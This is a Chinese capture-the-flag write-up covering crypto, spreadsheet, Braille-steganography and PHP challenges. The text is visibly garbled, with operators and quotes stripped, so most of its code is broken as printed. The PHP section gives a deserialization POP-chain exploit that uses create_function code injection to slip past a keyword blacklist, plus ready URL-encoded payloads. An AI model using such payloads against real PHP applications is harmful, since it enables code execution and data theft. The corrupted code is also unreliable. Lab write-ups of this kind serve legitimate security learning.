参考[网鼎杯 2020 青龙组]you_raise_me_up。
m 73964803637492582853353338913523546944627084372081477892312545091623069227301 c 21572244511100216966799370397791432119463715616349800194229377843045443048821 n 2 ** 256 import sympy flag sympy.discrete_log(n,c,m) import binascii print(binascii.unhexlify(hex(flag)[2:]))
运行得flag{DASCTF_zjut}
2.Girlfriend’s account大写金额转小写参考大佬的博客
这里需要先把账单里面的件数手动转成阿拉伯数字 然后把文件另存为xls。然后直接上python3代码
# -*- coding: utf-8 -*-
import xlrd
def hantonum(str1):
dict1 { 壹 : 1, 贰 : 2, 叁 : 3, 肆 : 4, 伍 : 5, 陆 : 6, 柒 : 7, 捌 : 8, 玖 : 9}
dict2 { 拾 : 10, 佰 : 100, 千 : 1000, 万 : 10000, 元 : 1, 角 : 0.1, 分 : 0.01}
result 0
for index,i in enumerate(str1):
if index len(str1)-1:
if (i in dict1 and str1[index 1] in dict2) or (i in dict2 and str1[index 1] 万 ):
if str1[index 1] ! 万 :
result dict1[i] * dict2[str1[index 1]]
elif i in dict2:
result * 10000
else:
result dict1[i]
result * 10000
return result
print(hantonum( 壹佰壹拾玖元玖角玖分 ))
workBook xlrd.open_workbook( C:/Users/root/Desktop/1.xls );
sheet1_content1 workBook.sheet_by_index(0); # sheet索引从0开始
# 4. 获取整行和整列的值 数组
count 0
for i in range(1,5001):
rows sheet1_content1.row_values(i)
rows[0] round(hantonum(rows[0]),2)
count count (float(rows[0])*float(rows[1]))
print( flag{ str(round(count,2)) } )
3.双目失明 身残志坚
改后缀之后解压得到两张图 盲水印提取
这里开始还以为是空心、实心圆点表示二进制数。。。。搞了半天是盲文双拼 找个盲文拼音对照表
两列一组 翻译出来zhejianggongyedaxue
包上flag就行。
?php
class A {
public $var;
public function show(){
echo $this- var;
public function __invoke(){
$this- show();
class B{
public $func;
public $arg;
public function show(){
$func $this- func;
if(preg_match( /^[a-z0-9]*$/isD , $this- func) || preg_match( /fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail| |{|%|x| |$|*||| | | | |?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|.|log/i , $this- arg)) {
die( No!No!No! );
} else {
include flag.php ;
//There is no code to print flag in flag.php
$func( , $this- arg);
public function __toString(){
$this- show();
return br . Nice Job!! . br ;
if(isset($_GET[ pop ])){
$aaa unserialize($_GET[ pop ]);
$aaa();
else{
highlight_file(__FILE__);
这题参考BJDCTF2020]ezphp
构造poc:
?php
class A {
public $var;
class B{
public $func;
public $arg;
$a new A();
$b new B();
$a- var $b;
$b- func create_function ;
$b- arg }var_dump(get_defined_vars());// ;
$ser serialize($a);
echo(urlencode($ser));
// $aaa unserialize($ser);
// $aaa();
得到exp:
O%3A1%3A%22A%22%3A1%3A%7Bs%3A3%3A%22var%22%3BO%3A1%3A%22B%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A15%3A%22create_function%22%3Bs%3A3%3A%22arg%22%3Bs%3A32%3A%22%7Dvar_dump%28get_defined_vars%28%29%29%3B%2F%2F%22%3B%7D%7D
传进去
好特么气啊
继续构造poc:
?php
class A {
public $var;
public function show(){
echo $this- var;
public function __invoke(){
$this- show();
class B{
public $func;
public $arg;
public function show(){
$func $this- func;
if(preg_match( /^[a-z0-9]*$/isD , $this- func) || preg_match( /fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail| |{|%|x| |$|*||| | | | |?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|echo|light|print|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|.|log/i , $this- arg)) {
die( No!No!No! );
} else {
$func( , $this- arg);
public function __toString(){
$this- show();
return br . Nice Job!! . br ;
$a new A();
$b new B();
$a- var $b;
$b- func create_function ;
$b- arg }require(base64_decode(VHJ1M2ZsYWcucGhw));var_dump(get_defined_vars());// ;
$ser serialize($a);
echo(urlencode($ser));
// $aaa unserialize($ser);
// $aaa();
得到exp:
O%3A1%3A%22A%22%3A1%3A%7Bs%3A3%3A%22var%22%3BO%3A1%3A%22B%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A15%3A%22create_function%22%3Bs%3A3%3A%22arg%22%3Bs%3A73%3A%22%7Drequire%28base64_decode%28VHJ1M2ZsYWcucGhw%29%29%3Bvar_dump%28get_defined_vars%28%29%29%3B%2F%2F%22%3B%7D%7D
传进去得到flag:
